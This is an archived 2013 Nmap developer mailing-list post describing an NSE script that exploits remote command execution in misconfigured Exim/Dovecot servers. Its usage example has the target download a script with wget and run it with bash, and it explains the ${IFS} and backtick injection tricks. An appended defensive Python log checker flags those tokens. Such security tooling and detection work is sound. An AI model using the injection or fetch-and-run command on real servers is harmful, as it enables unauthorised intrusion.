Nmap Development mailing list archives
[NSE] Exim w/ Dovecot Remote Command Execution vulnerability
From: Paulino Calderon <paulino () calderonpale com>
Date: Sun, 05 May 2013 10:16:36 -0500
Hi list,

Can I get some help testing this?

description = [[
Attempts to exploit a remote command execution vulnerability in misconfigured Dovecot/Exim mail servers.

It is important to note that the mail server will not return the output of the command. The mail server also won't allow space characters but they can be replaced with "${IFS}". Commands can also be concatenated with "``". The script takes care of the conversion automatically when setting the argument "cmd".

References:
* https://www.redteam-pentesting.de/en/advisories/rt-sa-2013-001/-exim-with-dovecot-typical-misconfiguration-leads-to-remote-command-execution
* http://immunityproducts.blogspot.mx/2013/05/how-common-is-common-exim-and-dovecot.html
* CVE not available yet
]]

---
-- @usage nmap -sV --script smtp-dovecot-exim-exec --script-args smtp-dovecot-exim-exec.cmd="uname -a" <target>
-- @usage nmap -p586 --script smtp-dovecot-exim-exec --script-args smtp-dovecot-exim-exec.cmd="wget -O /tmp/p example.com/test.sh;bash /tmp/p" <target>
--
-- @output
-- PORT    STATE SERVICE REASON
-- 465/tcp open  smtps   syn-ack
-- |_smtp-dovecot-exim-exec: Malicious payload delivered:250 OK id=XXX
--
-- @args smtp-dovecot-exim-exec.cmd Command to execute. Separate commands with ";".
-- @args smtp-dovecot-exim-exec.auth Authentication scheme (Optional).
-- @args smtp-dovecot-exim-exec.user Authentication username (Optional).
-- @args smtp-dovecot-exim-exec.pwd Authentication password (Optional).
-- @args smtp-dovecot-exim-exec.from Email address to use in the FROM field. Default: nmap+domain. (Optional).
-- @args smtp-dovecot-exim-exec.to Email address to use in the TO field. Default: nmap () mailinator com
-- @args smtp-dovecot-exim-exec.timeout Timeout value. Default: 8000. (Optional)
-- @args smtp-dovecot-exim-exec.domain Domain name to use. It attempts to set this field automatically. (Optional)
---
Attachment: smtp-dovecot-exim-exec.nse
_______________________________________________
Sent through the dev mailing list
http://nmap.org/mailman/listinfo/dev
Archived at http://seclists.org/nmap-dev/
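Added example, not part of the original post or the attached script: a defender-side check that scans Exim main-log arrival lines for the constructs the script description names ("${IFS}" and backticks) in the envelope sender. It assumes the injected command travels in the SMTP envelope sender, as the referenced RedTeam advisory describes; the log lines, message ids and addresses below are constructed.

```python
import re

# Shell constructs with no business in an envelope sender. "${IFS}" and the
# backtick are the two named in the script description; "$(" and ";" are
# added here as an assumption about equivalent shell syntax. A backtick is
# legal in an address local part but rare enough to be worth a look.
SUSPICIOUS = re.compile(r"\$\{IFS\}|`|\$\(|;")

# Exim main-log arrival line: "<date> <time> <msg-id> <= <sender> ..."
ARRIVAL = re.compile(r"^(\S+ \S+) (\S+) <= (\S+)(.*)$")
REMOTE_IP = re.compile(r"\[([0-9a-fA-F.:]+)\]")

def suspicious_arrivals(lines):
    """Return (timestamp, msg_id, sender, remote_ip, tokens) per flagged arrival."""
    hits = []
    for line in lines:
        m = ARRIVAL.match(line.strip())
        if not m:
            continue  # delivery, rejection or other non-arrival line
        ts, msg_id, sender, rest = m.groups()
        tokens = sorted(set(SUSPICIOUS.findall(sender)))
        if tokens:
            ip = REMOTE_IP.search(rest)
            hits.append((ts, msg_id, sender, ip.group(1) if ip else None, tokens))
    return hits

# Constructed sample log (documentation addresses, made-up message ids).
SAMPLE_LOG = """\
2013-05-05 10:16:36 1UZ0aA-0001Cd-EF <= alice@example.org H=mail.example.org [192.0.2.10] P=esmtp S=1204
2013-05-05 10:17:02 1UZ0aB-0001Ce-GH <= x`echo${IFS}test`y@example.net H=(probe) [198.51.100.7] P=smtp S=312
2013-05-05 10:17:40 1UZ0aC-0001Cf-IJ => bob@example.org R=dovecot_router T=dovecot_deliver
2013-05-05 10:18:11 1UZ0aD-0001Cg-KL <= <> R=1UZ0aB-0001Ce-GH U=Debian-exim P=local S=2100
""".splitlines()

if __name__ == "__main__":
    for hit in suspicious_arrivals(SAMPLE_LOG):
        print(hit)
```

The null sender "<>" on bounce lines is deliberately not flagged, so angle brackets are left out of the pattern.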